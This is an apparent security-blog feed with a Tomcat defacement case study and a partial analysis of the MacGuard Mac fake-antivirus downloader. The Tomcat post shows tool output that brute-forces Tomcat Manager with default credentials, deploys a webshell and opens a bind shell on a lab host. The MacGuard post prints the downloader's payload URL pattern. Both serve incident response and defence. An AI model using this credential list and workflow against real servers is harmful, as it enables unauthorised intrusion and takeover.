tag:blogger.com,1999:blog-10227314708138815752024-03-19T10:54:45.584+08:00x9090's BlogDedicated to computer security, pentesting and vulnerabilities, malware updates and analysisx9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.comBlogger31125tag:blogger.com,1999:blog-1022731470813881575.post-1976574340875701872012-09-12T05:58:00.002+08:002012-09-12T06:21:43.244+08:00A Case Study of Tomcat Web Server DefacementI have been asked to investigate a web server which is believed to be compromised by attacker. I knew it was compromised because Symantec detected some files which are located in Apache Tomcat default installation folder:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdhyphenhyphenQdqwb4cbJAzgIDMSo-BDELSwrPZXKMdb2IzC932Rj0IpzMjlWsLFP-_A4BFkiJdiF_XsHnacEnzfR7mP4vJ5h6LaG_MaAzpQ4WP6OX7k9tD8c9jSkh-93rtf2htsJOGSAn6Aaz9-nk/s1600/hacktool_blur.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdhyphenhyphenQdqwb4cbJAzgIDMSo-BDELSwrPZXKMdb2IzC932Rj0IpzMjlWsLFP-_A4BFkiJdiF_XsHnacEnzfR7mP4vJ5h6LaG_MaAzpQ4WP6OX7k9tD8c9jSkh-93rtf2htsJOGSAn6Aaz9-nk/s320/hacktool_blur.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<u>Figure 1: Symantec detected suspicious HackTool</u></div>
<br />
Unfortunately I can't find the quarantined file from the quarantine setting/folder. Symantec's detection name is a generic one and the description page does not give us any clue about this file.<br />
<br />
<h2>
<span style="font-size: x-large;">Information Gathering</span></h2>
I decided to use Google search and hopefully it will provide me some useful hints. Interestingly, I tried a couple of search queries with no luck for example "<b><span style="color: yellow;">2.jsp</span></b>", "<b><span style="color: yellow;">docs\funcspecs</span></b>" and etc. At last, I managed to find something interesting using search query "<b><span style="color: yellow;">docs\funcspecs\2.jsp</span></b>" and Google returned a few number of results:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnPWD_QC-d7VdViqHfZi_mXaelWcfymbMkf3sXPCSUVqVAL3PQfR7CyrcaFSXMqGaJPIvhf-Wg1klAPllIxWrxp2QdUFjTuC8IWEjq8iLrvGFG-35tkooz2GsuHZuBdP7YfuGF0fiwI1O0/s1600/cropped_google_search_2_jsp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnPWD_QC-d7VdViqHfZi_mXaelWcfymbMkf3sXPCSUVqVAL3PQfR7CyrcaFSXMqGaJPIvhf-Wg1klAPllIxWrxp2QdUFjTuC8IWEjq8iLrvGFG-35tkooz2GsuHZuBdP7YfuGF0fiwI1O0/s640/cropped_google_search_2_jsp.png" width="640" /></a></div>
<div style="text-align: center;">
<u>Figure 2: "docs\funcspecs\2.jsp" search result </u></div>
<br />
Simply visiting one of the link will lead you to a webpage that looks like a file browser. At the bottom of the webpage, we can clearly see the original author copyright information: <b><span style="color: magenta;">jsp File Browser version 1.2 by www.vonloesch.de</span></b>. Apparently this is an open source JSP file browser which can be further verified after reading the author official's website.<br />
<br />
<h2>
<span style="font-size: x-large;">Understanding the Root Cause</span></h2>
There are 2 questions come to my mind until here:<br />
<ol>
<li>How Tomcat was compromised? Why JSP file browser uploaded to the server with a consistent file path: "<span style="color: yellow;">docs\funcspecs</span>"?</li>
<li>What was the vulnerability (if any) the attacker could use in order to compromise the website? </li>
</ol>
In order to further understand how the attack was performed, I quickly check Tomcat log files and found the following:<br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">x9090mbp:deploy-undeploy-manager-catalina-log x9090$ grep -i "docs" *</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:Info: Undeploying context [/docs]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:</span><span style="color: lime; font-family: 'Courier New', Courier, monospace; font-size: x-small;">Info</span><span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">: Deploying web application archive docs.war</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:</span><span style="color: lime; font-family: 'Courier New', Courier, monospace; font-size: x-small;">Info</span><span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">: Deploying web application archive docs.war</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">manager.2012-08-29.log:</span><span style="color: lime; font-family: 'Courier New', Courier, monospace; font-size: x-small;">Info</span><span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">: HTMLManager: undeploy: Undeploying web application at '/docs'</span><br />
<br />
We can see deploy/undeploy commands from the log and according to our Java developer, he didn't deploy/undeploy "<span style="color: yellow;">docs</span>" at all. For those who are not familiar with Tomcat, "<span style="color: yellow;">docs</span>" is a Tomcat webapp that contains documentation page that come with Apache Tomcat by default.<br />
<br />
Looking for the Tomcat vulnerabilities from CVE database, we can conclude that there is one potential vulnerability that allows the attacker to upload files to Tomcat server. I believe the vulnerability could be related to <a href="http://www.cvedetails.com/cve/CVE-2011-3190/">CVE-2011-3190</a> with the following facts:<br />
<ul>
<li>We are running the vulnerable Tomcat as described by the CVE</li>
<li>This vulnerability allows remote attackers to bypass authentication and disclose sensitive information on the targeted server.</li>
<li>Last but not least, the complexity of this vulnerability is low :)</li>
</ul>
<div>
Despite of the low complexity of this vulnerability, I won't discuss the vulnerability in detail here and there exists a nice write-up on how to utilize this vulnerability with source code available: <a href="http://zhh2009.iteye.com/blog/1156191">http://zhh2009.iteye.com/blog/1156191</a>. Anyway as a heads-up, this vulnerability is due to the bug in AJP protocol which is exploitable only if you are running Apache web server as a proxy to Tomcat with mod_jk Apache module. This finding has disappointed me because we do not run Apache web server.</div>
<br />
I started wondering if there is other alternative methods to upload file to Tomcat server. Because I'm not really familiar to Tomcat server, I had spent some time to play around with Tomcat in my local environment. After that, I discovered something from Tomcat documentation where users are able to upload webapps using Tomcat Manager. Tomcat Manager is similar to the web administration panel that allows users to manage or configure the Tomcat server remotely. The authentication mechanism for Tomcat Manager is Basic Authentication. Besides that, Tomcat Manager also supports a series of administrator's commands such as deployment of webapps using HTTP PUT request.<br />
<br />
Christian Papathanasiou from TrustWave had presented his methods in Black Hat Europe 2010 on how to compromise Tomcat without exploiting any Tomcat vulnerability. In his paper, he described the methods how an attacker could use in order to control Tomcat server by using a simple webapp deployer tool. The tool could also brute-force Tomcat user account which usually comes with default username and password that most of the webmaster would left out.<br />
<br />
<h2>
<span style="font-size: x-large;">TomcatAutoPwn Pentesting Tool</span></h2>
Metasploit has come with a module that could achieve this goal, <a href="http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy">tomcat_mgr_deploy</a>. However this module requires username and password as input. So it is not handy to fully automate the process. So I decided to write a better tool using similar approach as in tomcat_mgr_deploy. The tool uses the wordlist provided by Metasploit, tomcat_mgr_default_userpass.txt.<br />
<br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">x9090mbp:PyTomcatAutoPwn x9090$ python PyTomcatAutoPwn.py 172.16.138.131 8080</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">TomcatAutoPwn</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Connecting to server 172.16.138.131...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Brute forcing 'Basic Authentication'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: j2deployer, password: j2deployer</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: ovwebusr, password: OvW*busr1</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: cxsdk, password: kdsxc</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: root, password: owaspbwa</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: ADMIN, password: ADMIN</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: xampp, password: xampp</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: tomcat, password: s3cret</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: admin, password: admintesting</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Failed in deployment</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> [*] FAIL - Application already exists at path /browser</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] TomcatAutoPwn will attempt to redeploy it.</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Undeploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Undeployed successfully</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deployed successfully</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Check OS version... Passed!</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Server running: Windows XP (5.1) [x86]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Webshell status enabled!: http://172.16.138.131:8080/browser/browser.jsp</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Which payload you would like to upload to server? (bind/reverse)bind</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Uploading payload to server...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Checking if payload is uploaded successfully? Success</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Bind shell is listening on 172.16.138.131:1234</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Connecting to target server...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Microsoft Windows XP [Version 5.1.2600]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">(C) Copyright 1985-2001 Microsoft Corp.</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>ipconfig</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">ipconfig</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Windows IP Configuration</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Ethernet adapter Local Area Connection:</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Connection-specific DNS Suffix . : localdomain</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> IP Address. . . . . . . . . . . . : 172.16.138.131</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Subnet Mask . . . . . . . . . . . : 255.255.255.0</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Default Gateway . . . . . . . . . : 172.16.138.2</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Ethernet adapter Bluetooth Network Connection:</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Media State . . . . . . . . . . . : Media disconnected</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>echo %USERPROFILE%</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">echo %USERPROFILE%</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Documents and Settings\LocalService</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>net config server</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">net config server</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server Name \\USER-851E78F1E7</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server Comment </span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Software version Windows 2002</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server is active on </span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>NetbiosSmb (000000000000)</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>NetBT_Tcpip_{8B05CFDD-E437-4D30-BEC1-399C2B487D52} (000c295a6877)</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server hidden No</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Maximum Logged On Users 10</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Maximum open files per session 16384</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Idle session time (min) 15</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">The command completed successfully.</span><br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0></span><br />
<br />
<br />
<h2>
<span style="font-size: x-large;">Securing your Tomcat</span></h2>
The lessons learnt from this incident and the following actions have been taken to harden Tomcat:
<br />
<div>
<ul>
<li>Rule of thumb: Use non-dictionary username and password</li>
<li>Use LockOut realm to prevent unlimited invalid login attempts to Tomcat Manager</li>
<li>Web access is not logged by Tomcat by default. Configure AccessLogValve to log web traffic </li>
<li>Update latest version of Tomcat</li>
</ul>
</div>
<h2>
<span style="font-size: x-large;">References</span></h2>
[1] Abusing JBoss by Christian Papathanasiou<br />
[2] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner by Kingcope<br />
[3] Improving Apache Tomcat Security - A Step By Step Guide - <a href="http://www.mulesoft.com/tomcat-security">http://www.mulesoft.com/tomcat-security</a><br />
<br />
Signing off
@x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com8tag:blogger.com,1999:blog-1022731470813881575.post-60205529481961712682011-06-02T23:55:00.002+08:002011-06-03T00:04:13.706+08:00MacGuard Downloader for MacDefender/MacProtector/MacSecurity<div class="MsoNormal"><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The evolution of MacDefender is out of expectation. Mac rogue antivirus has evolved rapidly until the latest variant MacGuard which does not require administrator password during installation. See MacGuard in action in below screenshots:</span></div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl4LbXVkMgGTO-9YPUVOjy4AeNReG6fuNS783eUeCaunsKEXGS9-hj0_YMGZ8AHwmdI97a2s5lAOIzLS3sfQP-otMxlGVVuBL3Mbf0perZ32elyUdusDeWhTLoc2dq-dFgrK8gzXXZpWy/s1600/MacGuard_first_phase.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl4LbXVkMgGTO-9YPUVOjy4AeNReG6fuNS783eUeCaunsKEXGS9-hj0_YMGZ8AHwmdI97a2s5lAOIzLS3sfQP-otMxlGVVuBL3Mbf0perZ32elyUdusDeWhTLoc2dq-dFgrK8gzXXZpWy/s320/MacGuard_first_phase.jpg" width="320" /></span></a></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 1: MacGuard is downloading </span></u></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></div><div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDntDZmXBQNdl-_VU-7PG2YWhbCzZKRap1MdwJny982lYn29PymXcyIxXRqw1A3z3vSLI-xWnIN4iJhp286ovvqfYsv7SguJAIjcPET9SsarVAFV6UywAAKziL-M6XBbFT8b2_TmJfVwJ/s1600/MacGuard_second_phase.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDntDZmXBQNdl-_VU-7PG2YWhbCzZKRap1MdwJny982lYn29PymXcyIxXRqw1A3z3vSLI-xWnIN4iJhp286ovvqfYsv7SguJAIjcPET9SsarVAFV6UywAAKziL-M6XBbFT8b2_TmJfVwJ/s320/MacGuard_second_phase.jpg" width="320" /></span></a></div></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 2: MacGuard installation</span></u></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></div><div style="text-align: left;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></div><div style="text-align: left;"><u><b><i><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Analysis of MacGuard Downloader</span></i></b></u></div><div style="text-align: left;"><u><b><i><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></i></b></u></div><div style="text-align: left;"></div><ol><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying malicious URL</span></b></li>
</ol><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">When <b style="mso-bidi-font-weight: normal;">avRunner </b>is executing, <b style="mso-bidi-font-weight: normal;">__DownloadWinCtrl_startDownloadingURL__ </b>handler will be executed to start the download routine. Basically, the downloader will first obtain the variables like:<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ul><li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span>The downloaded fake av archive installer’s name</span></li>
<li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The remote server where it hosts the fake av archive installer</span></li>
<li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span>Affiliates ID used by the server script</span></li>
</ul></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">These variables can be obtained through <b style="mso-bidi-font-weight: normal;">__ZL14getConfigParami. </b><o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">After the variables are obtained, a complete URL is formed which is the remote server address that stores the fake av archive installer. The URL format: </span><br />
<b style="mso-bidi-font-weight: normal;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></b><br />
<div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b style="mso-bidi-font-weight: normal;">http://[remote_server_ip]/mac/soft.php?affid=[id]</b><b style="mso-bidi-font-weight: normal;"><o:p></o:p></b></span></div></div><div class="MsoNormal"></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTu7H_3flP3vlJLUmUWeEx_ByRvmaXAmqvbkoxahTj211S9KqP4ZM3Y5bbSx1VfERiluNiWdpqXQ8wCy5J_vcHB1I_F3vaTsYUMoym26bQSM30-Rr3QtnI9XeP_k4T_ySUW1nmYLKB0pZk/s1600/Figure3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTu7H_3flP3vlJLUmUWeEx_ByRvmaXAmqvbkoxahTj211S9KqP4ZM3Y5bbSx1VfERiluNiWdpqXQ8wCy5J_vcHB1I_F3vaTsYUMoym26bQSM30-Rr3QtnI9XeP_k4T_ySUW1nmYLKB0pZk/s640/Figure3.png" width="640" /></span></a></div><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 3: Start Downloading Mac Fake AV Installer</span></u></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ol start="2"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying where the downloaded component will be stored</span></b></li>
</ol><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">If the URL is valid and the Objective-C <b style="mso-bidi-font-weight: normal;">NSURLDownload</b> returns a valid object, it will continue to call local function <b style="mso-bidi-font-weight: normal;">__ZL21getDownloadedFilePathv </b>to get the local folder directory to store the downloaded file.<o:p></o:p></span></div><div class="MsoNormal"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9atJX_Wnz0L7J8c8LIoqAmCNm4pDOHZRMbDyddVXODXWKHixA54yc77cqMCPQEaQ53pyHZUhgtY-ro2tDRp-ViA2GEOdzL4yI2pgdJozkR6LGLhyphenhyphenIfbiLfDsx-k91qYO2iTyyYHcmL4QG/s1600/Figure4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9atJX_Wnz0L7J8c8LIoqAmCNm4pDOHZRMbDyddVXODXWKHixA54yc77cqMCPQEaQ53pyHZUhgtY-ro2tDRp-ViA2GEOdzL4yI2pgdJozkR6LGLhyphenhyphenIfbiLfDsx-k91qYO2iTyyYHcmL4QG/s1600/Figure4.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><i style="mso-bidi-font-style: normal;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></u></i></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 4: Save the Downloaded File to Local Drive<o:p></o:p></span></u></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Within the <b style="mso-bidi-font-weight: normal;">__ZL21getDownloaderFilePathv, </b>it calls <b style="mso-bidi-font-weight: normal;">__ZL14getConfigParami</b> again to get the downloaded installer’s name. We will look at that function in the next part. The file will be downloaded to “<b style="mso-bidi-font-weight: normal;">/Application/[installer_name].app.zip</b>”<o:p></o:p></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7jS3Rz2T6-9XYY0nSPoOZVYOIyemzNp6dRUJVBrohD7vwjbpXUio6y2QPoVeVRsdSdL0BQVVvZLvWkJNjtwCOcPZHMMtE9b780dQoKx3gt5g7XJFVGFdNT49y65c-07d0E5CEhjvLtEzd/s1600/Figure5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7jS3Rz2T6-9XYY0nSPoOZVYOIyemzNp6dRUJVBrohD7vwjbpXUio6y2QPoVeVRsdSdL0BQVVvZLvWkJNjtwCOcPZHMMtE9b780dQoKx3gt5g7XJFVGFdNT49y65c-07d0E5CEhjvLtEzd/s1600/Figure5.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 5: Get the Downloaded File Path<o:p></o:p></span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<div style="text-align: left;"><ol start="3"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying the remote server URL</span></b></li>
</ol><div><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></b></div><ol start="3"><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> </span></b></ol></div></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">As the name implied, <b style="mso-bidi-font-weight: normal;">__Zl14getConfigParami</b> will read the configuration file and return the desired result, according to the argument passed by the caller, to the caller function.<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The configuration file is actually a PNG image file stored inside <b style="mso-bidi-font-weight: normal;">avRunner</b> package called <b style="mso-bidi-font-weight: normal;">DownloadPict.png</b> as shown in Figure 7. <o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
